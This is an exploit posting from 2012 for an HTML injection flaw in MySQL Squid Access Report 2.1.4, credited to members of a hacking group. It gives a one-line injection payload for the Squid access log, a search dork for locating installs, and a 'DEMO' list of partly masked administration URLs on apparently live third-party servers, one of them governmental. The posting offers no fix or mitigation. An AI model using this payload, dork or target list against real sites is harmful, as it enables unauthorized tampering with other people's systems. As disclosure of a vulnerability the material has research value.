# Exploit Title: MySQL Squid Access Report 2.1.4 / HTML Injection
# Date: 23/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://sourceforge.net/projects/mysar/
# Tested on: Linux
# Dork: MySQL Squid Access Report 2.1.4
#
# www.chap.cl
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
# be secured / stay secure
# contacto@chap.cl
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
find Squid's access.log file path and insert "><html tag>
Example: "><h1>PWNED!</h1>
[DEMO]
http://www.sXXXX.com.br/mysar/www/?a=administration
http://servidor.sXXX.gob.mx/mysar/index.php?a=administration
http://www.widXXXXXXXXX.com.br/wtiproxy/www/index.php?a=administration
